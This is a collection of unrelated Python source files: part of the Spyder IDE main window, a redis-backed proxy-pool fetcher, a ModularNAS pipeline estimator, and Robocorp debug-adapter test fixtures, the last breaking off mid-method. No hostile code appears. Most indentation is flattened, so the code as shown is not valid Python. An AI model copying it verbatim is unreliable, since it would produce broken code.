def set_window_title(self):
"""Set window title."""
if DEV is not None:
title = u"Spyder %s (Python %s.%s)" % (__version__,
sys.version_info[0],
sys.version_info[1])
elif running_in_mac_app() or is_pynsist():
title = "Spyder"
else:
title = u"Spyder (Python %s.%s)" % (sys.version_info[0],
sys.version_info[1])
if get_debug_level():
title += u" [DEBUG MODE %d]" % get_debug_level()
if self.window_title is not None:
title += u' -- ' + to_text_string(self.window_title)
# TODO: Remove self.projects reference once there's an API for setting
# window title.
if self.projects is not None:
path = self.projects.get_active_project_path()
if path:
path = path.replace(get_home_dir(), u'~')
title = u'{0} - {1}'.format(path, title)
self.base_title = title
self.setWindowTitle(self.base_title)
# TODO: To be removed after all actions are moved to their corresponding
# plugins
def register_shortcut(self, qaction_or_qshortcut, context, name,
add_shortcut_to_tip=True, plugin_name=None):
self.shortcuts.register_shortcut(
qaction_or_qshortcut,
context,
name,
add_shortcut_to_tip=add_shortcut_to_tip,
plugin_name=plugin_name,
)
# --- Other
def update_source_menu(self):
"""Update source menu options that vary dynamically."""
# This is necessary to avoid an error at startup.
# Fixes spyder-ide/spyder#14901
try:
self.editor.refresh_formatter_name()
except AttributeError:
pass
def free_memory(self):
"""Free memory after event."""
gc.collect()
def plugin_focus_changed(self):
"""Focus has changed from one plugin to another"""
self.update_edit_menu()
self.update_search_menu()
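# The two helpers below walk a menu and its submenus, attaching or clearing
# the shortcut stored in each SpyderAction's `_shown_shortcut` attribute.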
def show_shortcuts(self, menu):
"""Show action shortcuts in menu."""
menu_actions = menu.actions()
for action in menu_actions:
if getattr(action, '_shown_shortcut', False):
# This is a SpyderAction
if action._shown_shortcut is not None:
action.setShortcut(action._shown_shortcut)
elif action.menu() is not None:
# This is submenu, so we need to call this again
self.show_shortcuts(action.menu())
else:
# We don't need to do anything for other elements
continue
def hide_shortcuts(self, menu):
"""Hide action shortcuts in menu."""
menu_actions = menu.actions()
for action in menu_actions:
if getattr(action, '_shown_shortcut', False):
# This is a SpyderAction
if action._shown_shortcut is not None:
action.setShortcut(QKeySequence())
elif action.menu() is not None:
# This is submenu, so we need to call this again
self.hide_shortcuts(action.menu())
else:
# We don't need to do anything for other elements
continue
def hide_options_menus(self):
"""Hide options menu when menubar is pressed in macOS."""
for plugin in self.widgetlist + self.thirdparty_plugins:
if plugin.CONF_SECTION == 'editor':
editorstack = self.editor.get_current_editorstack()
editorstack.menu.hide()
else:
try:
# New API
plugin.options_menu.hide()
except AttributeError:
# Old API
plugin._options_menu.hide()
def get_focus_widget_properties(self):
"""Get properties of focus widget
Returns tuple (widget, properties) where properties is a tuple of
booleans: (is_console, not_readonly, readwrite_editor)"""
from spyder.plugins.editor.widgets.base import TextEditBaseWidget
from spyder.plugins.ipythonconsole.widgets import ControlWidget
widget = QApplication.focusWidget()
textedit_properties = None
if isinstance(widget, (TextEditBaseWidget, ControlWidget)):
console = isinstance(widget, ControlWidget)
not_readonly = not widget.isReadOnly()
readwrite_editor = not_readonly and not console
textedit_properties = (console, not_readonly, readwrite_editor)
return widget, textedit_properties
def update_edit_menu(self):
"""Update edit menu"""
widget, textedit_properties = self.get_focus_widget_properties()
if textedit_properties is None: # widget is not an editor/console
return
# !!! Below this line, widget is expected to be a QPlainTextEdit
# instance
console, not_readonly, readwrite_editor = textedit_properties
# Editor has focus and there is no file opened in it
if (not console and not_readonly and self.editor
and not self.editor.is_file_opened()):
return
# Disabling all actions to begin with
for child in self.edit_menu.actions():
child.setEnabled(False)
self.selectall_action.setEnabled(True)
# Undo, redo
self.undo_action.setEnabled(readwrite_editor
and widget.document().isUndoAvailable())
self.redo_action.setEnabled(readwrite_editor
and widget.document().isRedoAvailable())
# Copy, cut, paste, delete
has_selection = widget.has_selected_text()
self.copy_action.setEnabled(has_selection)
self.cut_action.setEnabled(has_selection and not_readonly)
self.paste_action.setEnabled(not_readonly)
# Comment, uncomment, indent, unindent...
if not console and not_readonly:
# This is the editor and current file is writable
if self.editor:
for action in self.editor.edit_menu_actions:
action.setEnabled(True)
def update_search_menu(self):
"""Update search menu"""
# Disabling all actions except the last one
# (which is Find in files) to begin with
for child in self.search_menu.actions()[:-1]:
child.setEnabled(False)
widget, textedit_properties = self.get_focus_widget_properties()
if textedit_properties is None: # widget is not an editor/console
return
# !!! Below this line, widget is expected to be a QPlainTextEdit
# instance
console, not_readonly, readwrite_editor = textedit_properties
# Find actions only trigger an effect in the Editor
if not console:
for action in self.search_menu.actions():
try:
action.setEnabled(True)
except RuntimeError:
pass
# Disable the replace action for read-only files
if len(self.search_menu_actions) > 3:
self.search_menu_actions[3].setEnabled(readwrite_editor)
def createPopupMenu(self):
return self.application.get_application_context_menu(parent=self)
def set_splash(self, message):
"""Set splash message"""
if self.splash is None:
return
if message:
logger.info(message)
self.splash.show()
self.splash.showMessage(message,
int(Qt.AlignBottom | Qt.AlignCenter |
Qt.AlignAbsolute),
QColor(Qt.black))
QApplication.processEvents()
def closeEvent(self, event):
"""closeEvent reimplementation"""
if self.closing(True):
event.accept()
else:
event.ignore()
def resizeEvent(self, event):
"""Reimplement Qt method"""
if not self.isMaximized() and not self.layouts.get_fullscreen_flag():
self.window_size = self.size()
QMainWindow.resizeEvent(self, event)
# To be used by the tour to be able to resize
self.sig_resized.emit(event)
def moveEvent(self, event):
"""Reimplement Qt method"""
if not self.isMaximized() and not self.layouts.get_fullscreen_flag():
self.window_position = self.pos()
QMainWindow.moveEvent(self, event)
# To be used by the tour to be able to move
self.sig_moved.emit(event)
def hideEvent(self, event):
"""Reimplement Qt method"""
try:
for plugin in (self.widgetlist + self.thirdparty_plugins):
# TODO: Remove old API
try:
# New API
if plugin.get_widget().isAncestorOf(
self.last_focused_widget):
plugin.change_visibility(True)
except AttributeError:
# Old API
if plugin.isAncestorOf(self.last_focused_widget):
plugin._visibility_changed(True)
QMainWindow.hideEvent(self, event)
except RuntimeError:
QMainWindow.hideEvent(self, event)
def change_last_focused_widget(self, old, now):
"""To keep track of to the last focused widget"""
if (now is None and QApplication.activeWindow() is not None):
QApplication.activeWindow().setFocus()
self.last_focused_widget = QApplication.focusWidget()
elif now is not None:
self.last_focused_widget = now
self.previous_focused_widget = old
def closing(self, cancelable=False):
"""Exit tasks"""
if self.already_closed or self.is_starting_up:
return True
if cancelable and CONF.get('main', 'prompt_on_exit'):
reply = QMessageBox.critical(self, 'Spyder',
'Do you really want to exit?',
QMessageBox.Yes, QMessageBox.No)
if reply == QMessageBox.No:
return False
if CONF.get('main', 'single_instance') and self.open_files_server:
self.open_files_server.close()
# Internal plugins
for plugin in (self.widgetlist + self.thirdparty_plugins):
# New API
try:
if isinstance(plugin, SpyderDockablePlugin):
plugin.close_window()
if not plugin.on_close(cancelable):
return False
except AttributeError:
pass
# Old API
try:
plugin._close_window()
if not plugin.closing_plugin(cancelable):
return False
except AttributeError:
pass
# New API: External plugins
for plugin_name in PLUGIN_REGISTRY.external_plugins:
plugin_instance = PLUGIN_REGISTRY.get_plugin(plugin_name)
try:
if isinstance(plugin_instance, SpyderDockablePlugin):
                    plugin_instance.close_window()
                if not plugin_instance.on_close(cancelable):
                    return False
except AttributeError as e:
logger.error(str(e))
# Save window settings *after* closing all plugin windows, in order
# to show them in their previous locations in the next session.
# Fixes spyder-ide/spyder#12139
prefix = 'window' + '/'
self.layouts.save_current_window_settings(prefix)
self.already_closed = True
return True
def add_dockwidget(self, plugin):
"""
Add a plugin QDockWidget to the main window.
"""
try:
# New API
if plugin.is_compatible:
dockwidget, location = plugin.create_dockwidget(self)
self.addDockWidget(location, dockwidget)
self.widgetlist.append(plugin)
except AttributeError:
# Old API
if plugin._is_compatible:
dockwidget, location = plugin._create_dockwidget()
self.addDockWidget(location, dockwidget)
self.widgetlist.append(plugin)
@Slot()
def global_callback(self):
"""Global callback"""
widget = QApplication.focusWidget()
action = self.sender()
callback = from_qvariant(action.data(), to_text_string)
from spyder.plugins.editor.widgets.base import TextEditBaseWidget
from spyder.plugins.ipythonconsole.widgets import ControlWidget
if isinstance(widget, (TextEditBaseWidget, ControlWidget)):
getattr(widget, callback)()
else:
return
def redirect_internalshell_stdio(self, state):
if state:
self.console.redirect_stds()
else:
self.console.restore_stds()
def open_external_console(self, fname, wdir, args, interact, debug, python,
python_args, systerm, post_mortem=False):
"""Open external console"""
if systerm:
# Running script in an external system terminal
try:
if CONF.get('main_interpreter', 'default'):
executable = get_python_executable()
else:
executable = CONF.get('main_interpreter', 'executable')
programs.run_python_script_in_terminal(
fname, wdir, args, interact, debug, python_args,
executable)
except NotImplementedError:
QMessageBox.critical(self, _("Run"),
_("Running an external system terminal "
"is not supported on platform %s."
) % os.name)
def open_file(self, fname, external=False):
"""
Open filename with the appropriate application
Redirect to the right widget (txt -> editor, spydata -> workspace, ...)
or open file outside Spyder (if extension is not supported)
"""
fname = to_text_string(fname)
ext = osp.splitext(fname)[1]
if encoding.is_text_file(fname):
self.editor.load(fname)
elif self.variableexplorer is not None and ext in IMPORT_EXT:
self.variableexplorer.import_data(fname)
elif not external:
fname = file_uri(fname)
start_file(fname)
def open_external_file(self, fname):
"""
Open external files that can be handled either by the Editor or the
variable explorer inside Spyder.
"""
# Check that file exists
fname = encoding.to_unicode_from_fs(fname)
if osp.exists(osp.join(CWD, fname)):
fpath = osp.join(CWD, fname)
elif osp.exists(fname):
fpath = fname
else:
return
# Don't open script that starts Spyder at startup.
# Fixes issue spyder-ide/spyder#14483
if sys.platform == 'darwin' and 'bin/spyder' in fname:
return
if osp.isfile(fpath):
self.open_file(fpath, external=True)
elif osp.isdir(fpath):
QMessageBox.warning(
self, _("Error"),
_('To open <code>{fpath}</code> as a project with Spyder, '
'please use <code>spyder -p "{fname}"</code>.')
.format(fpath=osp.normpath(fpath), fname=fname)
)
# --- Path Manager
# ------------------------------------------------------------------------
def load_python_path(self):
"""Load path stored in Spyder configuration folder."""
if osp.isfile(self.SPYDER_PATH):
with open(self.SPYDER_PATH, 'r', encoding='utf-8') as f:
path = f.read().splitlines()
self.path = tuple(name for name in path if osp.isdir(name))
if osp.isfile(self.SPYDER_NOT_ACTIVE_PATH):
with open(self.SPYDER_NOT_ACTIVE_PATH, 'r',
encoding='utf-8') as f:
not_active_path = f.read().splitlines()
self.not_active_path = tuple(name for name in not_active_path
if osp.isdir(name))
def save_python_path(self, new_path_dict):
"""
Save path in Spyder configuration folder.
`new_path_dict` is an OrderedDict that has the new paths as keys and
the state as values. The state is `True` for active and `False` for
inactive.
"""
path = [p for p in new_path_dict]
not_active_path = [p for p in new_path_dict if not new_path_dict[p]]
try:
encoding.writelines(path, self.SPYDER_PATH)
encoding.writelines(not_active_path, self.SPYDER_NOT_ACTIVE_PATH)
except EnvironmentError as e:
logger.error(str(e))
CONF.set('main', 'spyder_pythonpath', self.get_spyder_pythonpath())
def get_spyder_pythonpath_dict(self):
"""
Return Spyder PYTHONPATH.
The returned ordered dictionary has the paths as keys and the state
as values. The state is `True` for active and `False` for inactive.
Example:
            OrderedDict([('/some/path', True), ('/some/other/path', False)])
"""
self.load_python_path()
path_dict = OrderedDict()
for path in self.path:
path_dict[path] = path not in self.not_active_path
for path in self.project_path:
path_dict[path] = True
return path_dict
def get_spyder_pythonpath(self):
"""
Return Spyder PYTHONPATH.
"""
path_dict = self.get_spyder_pythonpath_dict()
path = [k for k, v in path_dict.items() if v]
return path
def update_python_path(self, new_path_dict):
"""Update python path on Spyder interpreter and kernels."""
# Load previous path
path_dict = self.get_spyder_pythonpath_dict()
# Save path
if path_dict != new_path_dict:
# It doesn't include the project_path
self.save_python_path(new_path_dict)
# Load new path
new_path_dict_p = self.get_spyder_pythonpath_dict() # Includes project
# Update Spyder interpreter
for path in path_dict:
while path in sys.path:
sys.path.remove(path)
for path, active in reversed(new_path_dict_p.items()):
if active:
sys.path.insert(1, path)
# Any plugin that needs to do some work based on this signal should
# connect to it on plugin registration
self.sig_pythonpath_changed.emit(path_dict, new_path_dict_p)
@Slot()
def show_path_manager(self):
"""Show path manager dialog."""
from spyder.widgets.pathmanager import PathManager
read_only_path = tuple(self.projects.get_pythonpath())
dialog = PathManager(self, self.path, read_only_path,
self.not_active_path, sync=True)
self._path_manager = dialog
dialog.sig_path_changed.connect(self.update_python_path)
dialog.redirect_stdio.connect(self.redirect_internalshell_stdio)
dialog.show()
def pythonpath_changed(self):
"""Project's PYTHONPATH contribution has changed."""
self.project_path = tuple(self.projects.get_pythonpath())
path_dict = self.get_spyder_pythonpath_dict()
self.update_python_path(path_dict)
#---- Preferences
def apply_settings(self):
"""Apply main window settings."""
qapp = QApplication.instance()
# Set 'gtk+' as the default theme in Gtk-based desktops
# Fixes spyder-ide/spyder#2036.
if is_gtk_desktop() and ('GTK+' in QStyleFactory.keys()):
try:
qapp.setStyle('gtk+')
except:
pass
default = self.DOCKOPTIONS
if CONF.get('main', 'vertical_tabs'):
default = default|QMainWindow.VerticalTabs
self.setDockOptions(default)
self.apply_panes_settings()
if CONF.get('main', 'use_custom_cursor_blinking'):
qapp.setCursorFlashTime(
CONF.get('main', 'custom_cursor_blinking'))
else:
qapp.setCursorFlashTime(self.CURSORBLINK_OSDEFAULT)
def apply_panes_settings(self):
"""Update dockwidgets features settings."""
for plugin in (self.widgetlist + self.thirdparty_plugins):
features = plugin.dockwidget.FEATURES
plugin.dockwidget.setFeatures(features)
try:
# New API
margin = 0
if CONF.get('main', 'use_custom_margin'):
margin = CONF.get('main', 'custom_margin')
plugin.update_margins(margin)
except AttributeError:
# Old API
plugin._update_margins()
@Slot()
def show_preferences(self):
"""Edit Spyder preferences."""
self.preferences.open_dialog(self.prefs_dialog_size)
def set_prefs_size(self, size):
"""Save preferences dialog size."""
self.prefs_dialog_size = size
# -- Open files server
def start_open_files_server(self):
self.open_files_server.setsockopt(socket.SOL_SOCKET,
socket.SO_REUSEADDR, 1)
port = select_port(default_port=OPEN_FILES_PORT)
CONF.set('main', 'open_files_port', port)
self.open_files_server.bind(('127.0.0.1', port))
self.open_files_server.listen(20)
        while True:
try:
req, dummy = self.open_files_server.accept()
except socket.error as e:
# See spyder-ide/spyder#1275 for details on why errno EINTR is
# silently ignored here.
eintr = errno.WSAEINTR if os.name == 'nt' else errno.EINTR
# To avoid a traceback after closing on Windows
if e.args[0] == eintr:
continue
# handle a connection abort on close error
enotsock = (errno.WSAENOTSOCK if os.name == 'nt'
else errno.ENOTSOCK)
if e.args[0] in [errno.ECONNABORTED, enotsock]:
return
raise
fname = req.recv(1024)
fname = fname.decode('utf-8')
self.sig_open_external_file.emit(fname)
req.sendall(b' ')
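    # The accept loop above implements a tiny handshake: a client connects,
    # sends one UTF-8 encoded file name (up to 1024 bytes) and waits for a
    # single space byte as acknowledgement. A minimal, hypothetical client
    # sketch (not the code Spyder itself uses to forward file names):
    #
    #     import socket
    #     def send_to_running_spyder(fname, port):
    #         s = socket.create_connection(('127.0.0.1', port))
    #         s.sendall(fname.encode('utf-8'))
    #         s.recv(1)  # wait for the b' ' acknowledgement
    #         s.close()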
# ---- Global Switcher
def open_switcher(self, symbol=False):
"""Open switcher dialog box."""
if self.switcher is not None and self.switcher.isVisible():
self.switcher.clear()
self.switcher.hide()
return
if symbol:
self.switcher.set_search_text('@')
else:
self.switcher.set_search_text('')
self.switcher.setup()
self.switcher.show()
# Note: The +6 pixel on the top makes it look better
# FIXME: Why is this using the toolbars menu? A: To not be on top of
# the toolbars.
# Probably toolbars should be taken into account for this 'delta' only
        # when they are visible
delta_top = (self.toolbar.toolbars_menu.geometry().height() +
self.menuBar().geometry().height() + 6)
self.switcher.set_position(delta_top)
def open_symbolfinder(self):
"""Open symbol list management dialog box."""
self.open_switcher(symbol=True)
def create_switcher(self):
"""Create switcher dialog instance."""
if self.switcher is None:
from spyder.widgets.switcher import Switcher
self.switcher = Switcher(self)
return self.switcher
# --- For OpenGL
def _test_setting_opengl(self, option):
"""Get the current OpenGL implementation in use"""
if option == 'software':
return QCoreApplication.testAttribute(Qt.AA_UseSoftwareOpenGL)
elif option == 'desktop':
return QCoreApplication.testAttribute(Qt.AA_UseDesktopOpenGL)
elif option == 'gles':
return QCoreApplication.testAttribute(Qt.AA_UseOpenGLES)
#==============================================================================
# Main
#==============================================================================
def main(options, args):
"""Main function"""
# **** For Pytest ****
if running_under_pytest():
if CONF.get('main', 'opengl') != 'automatic':
option = CONF.get('main', 'opengl')
set_opengl_implementation(option)
app = create_application()
window = create_window(MainWindow, app, None, options, None)
return window
# **** Handle hide_console option ****
if options.show_console:
print("(Deprecated) --show console does nothing, now the default "
" behavior is to show the console, use --hide-console if you "
"want to hide it")
if set_attached_console_visible is not None:
set_attached_console_visible(not options.hide_console
or options.reset_config_files
or options.reset_to_defaults
or options.optimize
or bool(get_debug_level()))
# **** Set OpenGL implementation to use ****
# This attribute must be set before creating the application.
# See spyder-ide/spyder#11227
if options.opengl_implementation:
option = options.opengl_implementation
set_opengl_implementation(option)
else:
if CONF.get('main', 'opengl') != 'automatic':
option = CONF.get('main', 'opengl')
set_opengl_implementation(option)
# **** Set high DPI scaling ****
# This attribute must be set before creating the application.
if hasattr(Qt, 'AA_EnableHighDpiScaling'):
QCoreApplication.setAttribute(Qt.AA_EnableHighDpiScaling,
CONF.get('main', 'high_dpi_scaling'))
# **** Set debugging info ****
if get_debug_level() > 0:
delete_debug_log_files()
setup_logging(options)
# **** Create the application ****
app = create_application()
# **** Create splash screen ****
splash = create_splash_screen()
if splash is not None:
splash.show()
splash.showMessage(
_("Initializing..."),
int(Qt.AlignBottom | Qt.AlignCenter | Qt.AlignAbsolute),
QColor(Qt.black)
)
QApplication.processEvents()
if options.reset_to_defaults:
# Reset Spyder settings to defaults
CONF.reset_to_defaults()
return
elif options.optimize:
# Optimize the whole Spyder's source code directory
import spyder
programs.run_python_script(module="compileall",
args=[spyder.__path__[0]], p_args=['-O'])
return
# **** Read faulthandler log file ****
faulthandler_file = get_conf_path('faulthandler.log')
previous_crash = ''
if osp.exists(faulthandler_file):
with open(faulthandler_file, 'r') as f:
previous_crash = f.read()
# Remove file to not pick it up for next time.
try:
dst = get_conf_path('faulthandler.log.old')
shutil.move(faulthandler_file, dst)
except Exception:
pass
CONF.set('main', 'previous_crash', previous_crash)
# **** Set color for links ****
set_links_color(app)
# **** Create main window ****
mainwindow = None
try:
if PY3 and options.report_segfault:
import faulthandler
with open(faulthandler_file, 'w') as f:
faulthandler.enable(file=f)
mainwindow = create_window(
MainWindow, app, splash, options, args
)
else:
mainwindow = create_window(MainWindow, app, splash, options, args)
except FontError:
QMessageBox.information(None, "Spyder",
"Spyder was unable to load the <i>Spyder 3</i> "
"icon theme. That's why it's going to fallback to the "
"theme used in Spyder 2.<br><br>"
"For that, please close this window and start Spyder again.")
CONF.set('appearance', 'icon_theme', 'spyder 2')
if mainwindow is None:
# An exception occurred
if splash is not None:
splash.hide()
return
ORIGINAL_SYS_EXIT()
if __name__ == "__main__":
main()
|
py_cli.py
|
"""
This module provides the core algorithm for picking up proxy IP resources.
"""
import time
import threading
from utils import get_redis_conn
from config.settings import (
DATA_ALL, LOWEST_TOTAL_PROXIES)
from .core import IPFetcherMixin
__all__ = ['ProxyFetcher']
lock = threading.RLock()
class Strategy:
strategy = None
def check(self, strategy):
return self.strategy == strategy
def get_proxies_by_stragery(self, pool):
"""
:param pool: pool is a list, which is mutable
:return:
"""
raise NotImplementedError
def process_feedback(self, pool, res, proxy, **kwargs):
"""
:param pool: ProxyFetcher's pool
:param res: success or failure
:param proxy: proxy ip
:param kwargs: response time or expected response time
:return: None
"""
raise NotImplementedError
class RobinStrategy(Strategy):
def __init__(self):
super().__init__()
self.strategy = 'robin'
def get_proxies_by_stragery(self, pool):
if not pool:
return None
proxy = pool.pop(0)
pool.append(proxy)
return proxy
def process_feedback(self, pool, res, proxy, **kwargs):
if res == 'failure':
if pool[-1] == proxy:
with lock:
if pool[-1] == proxy:
pool.pop()
return
class GreedyStrategy(Strategy):
def __init__(self):
self.strategy = 'greedy'
def get_proxies_by_stragery(self, pool):
if not pool:
return None
return pool[0]
def process_feedback(self, pool, res, proxy, **kwargs):
if res == 'failure':
if pool[0] == proxy:
with lock:
if pool[0] == proxy:
pool.pop(0)
return
expected_time = kwargs.get('expected')
real_time = kwargs.get('real')
if expected_time * 1000 < real_time:
pool.pop(0)
pool.append(proxy)
class ProxyFetcher(IPFetcherMixin):
def __init__(self, usage, strategy='robin', fast_response=5, redis_args=None):
"""
:param usage: one of SCORE_MAPS's keys, such as https
you must refresh pool
:param strategy: the load balance of proxy ip, the value is
one of ['robin', 'greedy']
:param fast_response: if you use greedy strategy, if will be needed to
decide whether a proxy ip should continue to be used
:param redis_args: redis connetion args, it's a dict, the keys
include host, port, db and password
"""
        # if there are multiple parent classes, super() only applies to the first parent according to the MRO
super().__init__(usage)
self.strategy = strategy
# pool is a queue, which is FIFO
self.pool = list()
self.fast_response = fast_response
self.handlers = [RobinStrategy(), GreedyStrategy()]
if isinstance(redis_args, dict):
self.conn = get_redis_conn(**redis_args)
else:
self.conn = get_redis_conn()
t = threading.Thread(target=self._refresh_periodically)
t.setDaemon(True)
t.start()
def get_proxy(self):
"""
        Get one available proxy from redis; if none is available, return None.
        :return: a proxy or None
"""
proxy = None
self.refresh()
for handler in self.handlers:
if handler.strategy == self.strategy:
proxy = handler.get_proxies_by_stragery(self.pool)
return proxy
def get_proxies(self):
        # the older proxies will not be dropped
proxies = self.get_available_proxies(self.conn)
# client_logger.info('{} proxies have been fetched'.format(len(proxies)))
print('{} proxies have been fetched'.format(len(proxies)))
self.pool.extend(proxies)
return self.pool
def proxy_feedback(self, res, proxy, response_time=None):
"""
client should give feedbacks after executing get_proxy()
:param res: value of 'success' or 'failure'
:param proxy: proxy ip
:param response_time: the response time using current proxy ip
"""
for handler in self.handlers:
if handler.strategy == self.strategy:
handler.process_feedback(self.pool, res,
proxy, real=response_time,
expected=self.fast_response)
def refresh(self):
if len(self.pool) < LOWEST_TOTAL_PROXIES:
self.get_proxies()
def delete_proxy(self, proxy):
pipe = self.conn.pipeline(True)
pipe.srem(DATA_ALL, proxy)
pipe.zrem(self.score_queue, proxy)
pipe.zrem(self.speed_queue, proxy)
pipe.zrem(self.ttl_queue, proxy)
pipe.execute()
def _refresh_periodically(self):
"""refresh self.pool periodically.Check 10 times in a second"""
while True:
if len(self.pool) < int(2 * LOWEST_TOTAL_PROXIES):
self.get_proxies()
time.sleep(0.2)
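# A minimal usage sketch (assumes a populated redis backend and that 'https'
# is a valid SCORE_MAPS key; the request itself is elided):
#
#     fetcher = ProxyFetcher('https', strategy='greedy', fast_response=5)
#     proxy = fetcher.get_proxy()
#     start = time.time()
#     try:
#         ...  # perform the request through `proxy`
#         fetcher.proxy_feedback('success', proxy,
#                                response_time=time.time() - start)
#     except Exception:
#         fetcher.proxy_feedback('failure', proxy)
#         fetcher.delete_proxy(proxy)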
|
pipeline.py
|
# -*- coding:utf-8 -*-
# Copyright (C) 2020. Huawei Technologies Co., Ltd. All rights reserved.
# This program is free software; you can redistribute it and/or modify
# it under the terms of the MIT License.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# MIT License for more details.
"""Pipeline Estimator."""
import traceback
import queue
from multiprocessing import Process, Pipe
from ..base import EstimBase
from modnas.registry.runner import build as build_runner
from modnas.registry import parse_spec
from modnas.registry.estim import register
def _mp_step_runner(conn, step_conf):
ret = build_runner(step_conf)
conn.send(ret)
def _mp_runner(step_conf):
p_con, c_con = Pipe()
proc = Process(target=_mp_step_runner, args=(c_con, step_conf))
proc.start()
proc.join()
if not p_con.poll(0):
return None
return p_con.recv()
def _default_runner(step_conf):
return build_runner(step_conf)
@register
class PipelineEstim(EstimBase):
"""Pipeline Estimator class."""
def __init__(self, *args, use_multiprocessing=False, **kwargs):
super().__init__(*args, **kwargs)
self.runner = _mp_runner if use_multiprocessing else _default_runner
def step(self, step_conf):
"""Return results from single pipeline process."""
try:
return self.runner(step_conf)
except RuntimeError:
self.logger.info('pipeline step failed with error: {}'.format(traceback.format_exc()))
return None
def run(self, optim):
"""Run Estimator routine."""
del optim
logger = self.logger
config = self.config
pipeconf = config.pipeline
pending = queue.Queue()
for pn in pipeconf.keys():
pending.put(pn)
finished = set()
ret_values, ret = dict(), None
while not pending.empty():
pname = pending.get()
pconf = pipeconf.get(pname)
dep_sat = True
for dep in pconf.get('depends', []):
if dep not in finished:
dep_sat = False
break
if not dep_sat:
pending.put(pname)
continue
ptype, pargs = parse_spec(pconf)
pargs['name'] = pargs.get('name', pname)
for inp_kw, inp_idx in pconf.get('inputs', {}).items():
keys = inp_idx.split('.')
inp_val = ret_values
for k in keys:
if not inp_val or k not in inp_val:
raise RuntimeError('input key {} not found in return {}'.format(inp_idx, ret_values))
inp_val = inp_val[k]
pargs[inp_kw] = inp_val
logger.info('pipeline: running {}, type={}'.format(pname, ptype))
ret = self.step(pconf)
ret_values[pname] = ret
logger.info('pipeline: finished {}, results={}'.format(pname, ret))
finished.add(pname)
ret_values['final'] = ret
logger.info('pipeline: all finished')
return ret_values
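# An illustrative (hypothetical) pipeline configuration for run(): each step
# is keyed by name, may declare 'depends' on earlier steps, and may wire
# 'inputs' from earlier results via dotted keys into ret_values.
#
#     pipeline:
#       search:
#         type: SearchStepRunner          # resolved via parse_spec/build_runner
#       train:
#         type: TrainStepRunner
#         depends: [search]
#         inputs:
#           arch_desc: search.best_arch   # -> ret_values['search']['best_arch']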
|
fixtures.py
|
# coding: utf-8
# Original work Copyright Fabio Zadrozny (EPL 1.0)
# See ThirdPartyNotices.txt in the project root for license information.
# All modifications Copyright (c) Robocorp Technologies Inc.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http: // www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from robocorp_ls_core.unittest_tools.fixtures import TIMEOUT
from robocorp_ls_core.subprocess_wrapper import subprocess
from collections import namedtuple
import queue
import threading
import pytest # type: ignore
import sys
import os
from typing import Dict, Optional, Iterable
from robocorp_ls_core.options import DEFAULT_TIMEOUT
import typing
if typing.TYPE_CHECKING:
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import Variable
__file__ = os.path.abspath(__file__)
if __file__.endswith((".pyc", ".pyo")):
__file__ = __file__[:-1]
_JsonHit = namedtuple("_JsonHit", "thread_id, frame_id, stack_trace_response")
@pytest.fixture
def dap_logs_dir(tmpdir):
import locale
logs_directory = tmpdir.join("logs_adapter")
logs_directory.mkdir()
yield logs_directory
for name in os.listdir(str(logs_directory)):
sys.stderr.write("\n--- %s contents:\n" % (name,))
if name in ("output.xml", "report.html", "log.html"):
sys.stderr.write("--- Not printed --- \n\n")
continue
with open(str(logs_directory.join(name)), "rb") as stream:
contents = stream.read().decode(locale.getpreferredencoding(), "replace")
sys.stderr.write(contents)
sys.stderr.write("\n\n")
@pytest.fixture
def dap_log_file(dap_logs_dir):
filename = str(dap_logs_dir.join("robotframework_dap_tests.log"))
sys.stderr.write("Logging subprocess to: %s\n" % (filename,))
yield filename
@pytest.fixture
def dap_process_stderr_file(dap_logs_dir):
filename = str(dap_logs_dir.join("robotframework_dap_tests_stderr.log"))
sys.stderr.write("Output subprocess stderr to: %s\n" % (filename,))
with open(filename, "wb") as stream:
yield stream
@pytest.fixture
def dap_process(dap_log_file, dap_process_stderr_file):
from robotframework_debug_adapter import __main__
from robocorp_ls_core.basic import kill_process_and_subprocesses
env = os.environ.copy()
env["ROBOTFRAMEWORK_DAP_LOG_LEVEL"] = "3"
env["ROBOTFRAMEWORK_DAP_LOG_FILENAME"] = dap_log_file
env["PYDEVD_DEBUG_FILE"] = dap_log_file
env["PYDEVD_DEBUG"] = "1"
dap_process = subprocess.Popen(
[sys.executable, "-u", __main__.__file__],
stdout=subprocess.PIPE,
stderr=dap_process_stderr_file,
stdin=subprocess.PIPE,
env=env,
)
assert dap_process.returncode is None
yield dap_process
if dap_process.returncode is None:
kill_process_and_subprocesses(dap_process.pid)
class _DebuggerAPI(object):
def __init__(
self,
reader=None,
writer=None,
write_queue=None,
read_queue=None,
dap_resources_dir=None,
):
self.reader = reader
self.writer = writer
self.write_queue = write_queue
self.read_queue = read_queue
self.all_messages_read = []
self.target = None
self.cwd = None
self.suite_target = None
self.dap_resources_dir = dap_resources_dir
def write(self, msg):
"""
:param BaseSchema msg:
The message to be written.
"""
self.write_queue.put(msg)
return msg
def read(self, expect_class=None, accept_msg=None):
"""
Waits for a message and returns it (may throw error if there's a timeout waiting for the message).
"""
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import OutputEvent
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import (
ConfigurationDoneResponse,
)
while True:
msg = self.read_queue.get(timeout=TIMEOUT)
if hasattr(msg, "to_dict"):
sys.stderr.write("Read: %s\n\n" % (msg.to_dict(),))
else:
sys.stderr.write("Read: %s\n\n" % (msg,))
self.all_messages_read.append(msg)
if expect_class is not None or accept_msg is not None:
if self._matches(msg, expect_class, accept_msg):
return msg
# Skip OutputEvent and ConfigurationDoneResponse. Other events must match.
if not isinstance(msg, (OutputEvent, ConfigurationDoneResponse)):
raise AssertionError(
"Received: %s when expecting: %s" % (msg, expect_class)
)
else:
# expect_class and accept_msg are None
return msg
return msg
def assert_message_found(self, expect_class=None, accept_msg=None):
for msg in self.all_messages_read:
if self._matches(msg, expect_class, accept_msg):
return True
raise AssertionError("Did not find expected message.")
def _matches(self, msg, expect_class=None, accept_msg=None):
